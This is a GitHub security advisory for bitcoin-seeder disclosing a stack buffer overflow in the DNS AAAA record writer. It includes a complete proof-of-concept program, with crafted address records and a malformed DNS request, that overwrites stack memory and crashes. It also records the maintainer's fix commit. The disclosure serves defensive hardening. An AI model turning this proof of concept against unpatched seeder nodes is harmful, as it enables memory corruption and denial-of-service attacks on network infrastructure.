bitcoin-seeder
bitcoin-seeder copied to clipboard
Published
20 hours ago •
sipa
sipa
Stack corruption
If a sufficient amount of AAAA records is associated with a DNS request, a buffer overflow will occur in write_record_aaaa; up to 11 bytes beyond the end of the output buffer can be overwritten.
Append this to dns.cpp:
const uint8_t addresses[19][20] = {
{ 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0B, 0x04, 0x00, 0x00, 0x00, 0x04, },
{ 0x04, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x48, 0x00, 0x00, 0x1E, 0x03, 0x00, 0x00, 0x00, 0x31, 0xFF, },
{ 0x04, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0xF6, 0xB7, 0xFF, 0xFF, 0xE1, 0xFF, 0xFF, 0xFC, 0x00, 0x00, 0xFF, },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x01, 0x00, 0x00, 0xFA, 0xFF, 0x00, 0x00, 0xFF, 0xFF, },
{ 0x04, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0xF6, 0xB7, 0xFF, 0xFF, 0xE1, 0xFF, 0xFF, 0xFC, 0x00, 0x00, 0xFF, },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x01, 0x00, 0x00, 0xFA, 0xFF, 0x00, 0x00, 0xFF, 0xFF, },
{ 0x04, 0x00, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x00, 0x02, 0x3A, 0xFF, 0xFF, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF, },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0B, 0x04, 0x00, 0xFF, 0x08, 0x00, },
{ 0x06, 0x00, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x30, 0x22, 0x3A, 0xFF, 0xFF, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF, },
{ 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x80, 0x0B, 0x04, 0x00, 0x00, 0x00, 0x00, },
{ 0x06, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF, },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x01, 0x00, 0x00, 0xFA, 0xFF, 0x00, 0x00, 0xFF, 0xFF, },
{ 0x06, 0x00, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x00, 0x02, 0x3A, 0xFF, 0xFF, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF, },
{ 0x04, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0B, 0x04, 0x00, 0xFF, 0x08, 0x00, },
{ 0x06, 0x00, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x30, 0x22, 0x3A, 0xFF, 0xFF, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF, },
{ 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x80, 0x0B, 0x04, 0x00, 0x00, 0x00, 0x00, },
{ 0x04, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF, },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0B, 0x04, 0x00, 0x00, 0x00, 0x00, },
{ 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCF, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, } };
int cb(void *opt, char *requested_hostname, addr_t *addr, int max, int ipv4, int ipv6) {
uint32_t num = 0;
while ( num < max && num < 19 ) {
memcpy(&addr[num], addresses[num], 20);
num++;
}
return num;
}
int main(void)
{
const uint8_t in[] = {0x1B, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x23, 0x00,
0x7A, 0x08, 0x00, 0x00, 0xFF, 0x00, 0xFF};
uint8_t out[BUFLEN];
dns_opt_t opt;
opt.port = 0;
opt.datattl = 0;
opt.nsttl = 0;
opt.host = "";
opt.ns = "";
opt.mbox = "";
opt.cb = cb;
opt.nRequests = 0;
dnshandle(&opt, in, sizeof(in), out);
return 0;
}
$ g++ dns.cpp && ./a.out
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)
Thanks for reporting! Should be fixed in b1cf356ff28db0425a935678471f9a3a2242042f.
Nice catch @guidovranken!
Very excited about your work: thanks for helping hardening various parts of the Bitcoin ecosystem by trying to break it! :)
I saw the Trezor firmware bug you found in https://github.com/trezor/trezor-firmware/pull/1374 the other day too. Solid work!
